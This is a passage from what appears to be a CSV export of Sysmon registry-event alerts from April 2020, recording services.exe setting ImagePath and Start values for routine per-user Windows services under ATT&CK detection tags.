10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\System32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_3ea3f\ImagePath +Details: C:\Windows\System32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 10:25:40.565",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.017212000Z"",""eventRecordID"":""534"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.540",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.013087000Z"",""eventRecordID"":""533"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k PrintWorkflow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k PrintWorkflow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k PrintWorkflow""" +"Apr 24, 2020 @ 10:25:40.506",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.012466500Z"",""eventRecordID"":""532"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.409",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.011150200Z"",""eventRecordID"":""531"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 10:25:40.398",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.010762700Z"",""eventRecordID"":""530"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.383",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.009467900Z"",""eventRecordID"":""529"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 10:25:40.343",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.008533700Z"",""eventRecordID"":""528"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_3ea3f\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 10:25:40.329",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.005449600Z"",""eventRecordID"":""527"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 10:25:40.316",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.005239800Z"",""eventRecordID"":""526"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.298",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.004210500Z"",""eventRecordID"":""525"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 10:25:40.287",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.003632200Z"",""eventRecordID"":""524"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.255",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.001338600Z"",""eventRecordID"":""523"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 10:25:40.244",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.000982500Z"",""eventRecordID"":""522"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.218",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.999775800Z"",""eventRecordID"":""521"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow -p""" +"Apr 24, 2020 @ 10:25:40.202",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.999409800Z"",""eventRecordID"":""520"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.199",9,"ATT&CK T1058:Registry edit for new 
